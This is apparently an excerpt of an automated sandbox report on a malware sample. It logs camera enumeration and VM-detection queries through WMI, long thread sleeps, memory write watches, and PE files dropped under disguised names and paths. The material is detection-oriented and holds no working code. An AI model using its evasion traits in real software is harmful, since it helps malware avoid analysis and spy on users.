                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Blockcomcrt\AgentMonitor.exeMemory allocated: 1240000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeMemory allocated: 1AC40000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeMemory allocated: 1450000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeMemory allocated: 1B2A0000 memory reserve | memory write watchJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeMemory allocated: 10D0000 memory reserve | memory write watch
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeMemory allocated: 1AE30000 memory reserve | memory write watch
                                    Source: C:\Blockcomcrt\AgentMonitor.exeMemory allocated: 2ED0000 memory reserve | memory write watch
                                    Source: C:\Blockcomcrt\AgentMonitor.exeMemory allocated: 1B1A0000 memory reserve | memory write watch
                                    Source: C:\Blockcomcrt\AgentMonitor.exeMemory allocated: 1000000 memory reserve | memory write watch
                                    Source: C:\Blockcomcrt\AgentMonitor.exeMemory allocated: 1ACA0000 memory reserve | memory write watch
                                    Source: C:\Recovery\csrss.exeMemory allocated: 31B0000 memory reserve | memory write watch
                                    Source: C:\Recovery\csrss.exeMemory allocated: 1B1B0000 memory reserve | memory write watch
                                    Source: C:\Recovery\csrss.exeMemory allocated: 2AE0000 memory reserve | memory write watch
                                    Source: C:\Recovery\csrss.exeMemory allocated: 1AAE0000 memory reserve | memory write watch
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeMemory allocated: E30000 memory reserve | memory write watch
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeMemory allocated: 1A920000 memory reserve | memory write watch
                                    Source: C:\Users\user\Desktop\Internal.exeCode function: 1_2_04AE2FBF sldt word ptr [eax]1_2_04AE2FBF
                                    Source: C:\Blockcomcrt\AgentMonitor.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 922337203685477Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 600000Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 599828Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 599562Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 599016Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 3600000Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 598453Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 598250Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 598000Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 597875Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 597687Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 597469Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 597312Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 597094Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 596344Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 596187Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 596078Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 595946Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 595836Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 595705Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 595578Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 595468Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 595359Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 595249Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 595140Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 595028Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 300000Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 594922Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 594797Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 594678Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 594547Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 594429Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 594309Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 594184Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 593781Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 593638Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 593523Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 593406Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 593297Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 593163Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 593046Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 592902Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 592787Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 592656Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 592546Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 592437Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 592328Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 592219Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 592094Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 591984Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 591875Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 591762Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 591562Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 591225Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 591083Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Blockcomcrt\AgentMonitor.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Blockcomcrt\AgentMonitor.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\csrss.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Recovery\csrss.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\Users\user\Desktop\Internal.exeWindow / User API: threadDelayed 758Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWindow / User API: threadDelayed 4352Jump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWindow / User API: threadDelayed 5308Jump to behavior
                                    Source: C:\Blockcomcrt\AgentMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\wekqfedd.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZcxEZvOD.logJump to dropped file
                                    Source: C:\Blockcomcrt\AgentMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\cQVCqZDT.logJump to dropped file
                                    Source: C:\Blockcomcrt\AgentMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\UjoVbfCg.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeDropped PE file which has not been started: C:\Users\user\Desktop\bQCMLIKB.logJump to dropped file
                                    Source: C:\Blockcomcrt\AgentMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\WuLVbyih.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeDropped PE file which has not been started: C:\Users\user\Desktop\Vmjnufha.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeDropped PE file which has not been started: C:\Users\user\Desktop\RypOpByW.logJump to dropped file
                                    Source: C:\Blockcomcrt\AgentMonitor.exeDropped PE file which has not been started: C:\Users\user\Desktop\fXTLLrxO.logJump to dropped file
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeDropped PE file which has not been started: C:\Users\user\Desktop\mVSSSdRf.logJump to dropped file
                                    Source: C:\Blockcomcrt\AgentMonitor.exe TID: 4152Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 4268Thread sleep time: -30000s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -600000s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -599828s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -599562s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -599016s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 5868Thread sleep time: -3600000s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -598453s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -598250s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -598000s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -597875s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -597687s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -597469s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -597312s >= -30000sJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe TID: 6588Thread sleep time: -597094s >= -30000sJump to behavior
